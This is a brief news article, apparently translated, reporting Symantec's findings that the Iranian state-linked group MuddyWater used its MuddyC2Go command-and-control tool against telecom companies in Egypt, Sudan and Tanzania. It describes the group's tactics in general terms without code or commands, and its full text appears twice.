The Iranian cyberweapon pointed its muzzle at African countries.
The hacker group MuddyWater, affiliated with the Iranian Ministry of Intelligence and Security, recently used its proprietary C2 system MuddyC2Go in attacks on the telecommunications sector in Egypt, Sudan and Tanzania. This information was provided by a team of Symantec researchers.
MuddyWater, active since 2017, is also known as Seedworm, Boggy Serpens, Cobalt Ulster, and others. The tool MuddyC2Go, written in Golang, was first discovered by Deep Instinct in November of this year. The tool replaces the previous C2 grouping systems PhonyC2 and MuddyC3.
MuddyC2Go contains an executable file with a PowerShell script that automatically connects to the attackers ' C2 server, allowing them to gain remote access to the victim's system.
A feature of the group's attacks is the use of phishing emails and vulnerabilities in outdated uncorrected software for initial access, followed by exploration, lateral movement and collection of data necessary for hackers.
In the latest attacks recorded in November 2023, the attackers also used the tools SimpleHelp, Venom Proxy, custom keyloggers and other publicly available programs. At the same time, to disguise its activities, the group subtly combines the software available in its arsenal, trying to remain invisible for as long as possible to achieve its strategic goals.
It is noted that MuddyWater continues to improve its arsenal of tools, actively using PowerShell and related tools and scripts. This highlights the need for organizations to pay attention to any suspicious use of PowerShell on their networks.
Thus, another manifestation of aggression on the part of national hacker groups highlights the fragility of the information security system in many critical industries in different countries. Effective counteraction is possible only through the development of strict rules for integrated cybersecurity and their competent application in practice.
The hacker group MuddyWater, affiliated with the Iranian Ministry of Intelligence and Security, recently used its proprietary C2 system MuddyC2Go in attacks on the telecommunications sector in Egypt, Sudan and Tanzania. This information was provided by a team of Symantec researchers.
MuddyWater, active since 2017, is also known as Seedworm, Boggy Serpens, Cobalt Ulster, and others. The tool MuddyC2Go, written in Golang, was first discovered by Deep Instinct in November of this year. The tool replaces the previous C2 grouping systems PhonyC2 and MuddyC3.
MuddyC2Go contains an executable file with a PowerShell script that automatically connects to the attackers ' C2 server, allowing them to gain remote access to the victim's system.
A feature of the group's attacks is the use of phishing emails and vulnerabilities in outdated uncorrected software for initial access, followed by exploration, lateral movement and collection of data necessary for hackers.
In the latest attacks recorded in November 2023, the attackers also used the tools SimpleHelp, Venom Proxy, custom keyloggers and other publicly available programs. At the same time, to disguise its activities, the group subtly combines the software available in its arsenal, trying to remain invisible for as long as possible to achieve its strategic goals.
It is noted that MuddyWater continues to improve its arsenal of tools, actively using PowerShell and related tools and scripts. This highlights the need for organizations to pay attention to any suspicious use of PowerShell on their networks.
Thus, another manifestation of aggression on the part of national hacker groups highlights the fragility of the information security system in many critical industries in different countries. Effective counteraction is possible only through the development of strict rules for integrated cybersecurity and their competent application in practice.
